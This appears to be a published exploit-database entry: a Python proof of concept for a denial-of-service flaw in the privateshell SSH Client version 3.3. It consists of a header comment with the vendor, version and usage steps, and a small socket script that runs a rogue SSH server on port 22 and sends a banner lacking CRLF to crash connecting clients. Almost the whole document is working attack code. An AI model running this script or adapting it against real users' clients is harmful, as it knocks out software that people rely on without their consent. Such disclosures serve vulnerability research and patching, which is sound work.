''' # Exploit title: privateshell SSH Client v.3.3 denial of service vulnerability # Date: 27-5-2015 # Vendor homepage: www.privateshell.com # Software Link: http://www.privateshell.com/files/pshell.exe # Version: 3.3 # Author: 3unnym00n # Details: # -------- # when doing the ssh version exchange, if the server send a banner missing \r\n, can lead the pshell crash # Tested On: win7 # operating steps: run the py, then execute : "D:\programfile\Private Shell\ssh.exe" root@ ''' import socket soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.bind(('', 22)) soc.listen(1) client, addr = soc.accept() client.send('SSH-2.0-SUCK') ## no "\r\n" lead to crash